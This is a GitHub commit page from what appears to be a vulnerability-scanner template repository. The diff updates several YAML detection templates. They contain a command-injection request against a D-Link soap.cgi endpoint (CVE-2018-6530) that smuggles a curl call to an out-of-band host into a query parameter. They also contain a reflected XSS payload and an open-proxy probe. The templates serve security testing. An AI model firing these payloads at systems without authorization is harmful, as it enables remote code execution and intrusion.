Skip to content

Commit

Permalink
Merge pull request #7646 from projectdiscovery/princechaddha-patch-2
Browse files Browse the repository at this point in the history
Release Prep
  • Loading branch information
princechaddha committed Jul 8, 2023
2 parents 3e1cac7 + 4c2b9ab commit 2dee090
Show file tree
Hide file tree
Showing 5 changed files with 13 additions and 2 deletions.
2 changes: 1 addition & 1 deletion http/cves/2018/CVE-2018-6530.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -19,7 +19,7 @@ info:
max-request: 1
tags: cve,cve2018,d-link,rce,oast,unauth

requests:
http:
- raw:
- |
POST /soap.cgi?service=whatever-control;curl {{interactsh-url}};whatever-invalid-shell HTTP/1.1
Expand Down
3 changes: 2 additions & 1 deletion http/cves/2023/CVE-2023-36346.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -20,7 +20,7 @@ info:
verified: "true"
tags: cve,cve2023,xss,pos,codekop,unauth

requests:
http:
- method: GET
path:
- "{{BaseURL}}/print.php?nm_member=<script>alert(document.location)</script>"
Expand All @@ -31,6 +31,7 @@ requests:
part: body
words:
- "<script>alert(document.location)</script>"
- "<title>print</title>"
condition: and

- type: word
Expand Down
1 change: 1 addition & 0 deletions http/exposed-panels/dell-idrac.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -21,6 +21,7 @@ http:
- '{{BaseURL}}/login.html'

stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
Expand Down
9 changes: 9 additions & 0 deletions http/misconfiguration/proxy/open-proxy-external.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -27,10 +27,19 @@ http:
GET http://{{interactsh-url}} HTTP/1.1
Host: {{interactsh-url}}
- |+
GET / HTTP/1.1
Host: {{Hostname}}
unsafe: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- contains(body_1, "www.iana.org") || contains(body_1, "<title>Example Domain</title>")
- contains(header_2, "X-Interactsh-Version")
condition: or

- type: dsl
dsl:
- '!contains(body_3, "<title>Example Domain</title>")'

0 comments on commit 2dee090

Please sign in to comment.